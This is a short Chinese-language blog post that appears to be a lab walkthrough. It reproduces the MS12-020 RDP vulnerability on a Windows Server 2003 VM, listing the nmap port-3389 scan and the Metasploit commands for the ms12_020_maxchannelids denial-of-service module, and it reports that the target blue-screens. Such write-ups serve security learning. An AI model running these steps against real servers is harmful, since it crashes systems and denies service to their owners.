通过Metasploit对MS12-020漏洞的简单利用
通过Metasploit对MS12-020漏洞的简单利用
前期准备
攻击机:kali
靶机:Windows_2003_server(打开3389端口)
环境配置
两台虚拟机以NAT模式连接
接着右键单机我的电脑,点击属性
选择远程,将该靶机的远程控制系统打开(3389端口即可开启)
复现过程
查看本机ip
nmap扫描网段是否开启3389端口
1 | nmap -p 3389 192.168.222.0/24 |
发现192.168.222.135开放3389端口
启动Metasploit
1 | msfconsole |
搜索ms12-020模块
1 | search ms12-020 |
利用第一个模块
1 | use auxiliary/dos/windows/rdp/ms12_020_maxchannelids |
查看可利用选项
1 | show options |
建立连接
1 | set rhost 192.168.222.135 |
运行
1 | run |
成功复现,靶机蓝屏
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 FakerCsr's Magic Box!
评论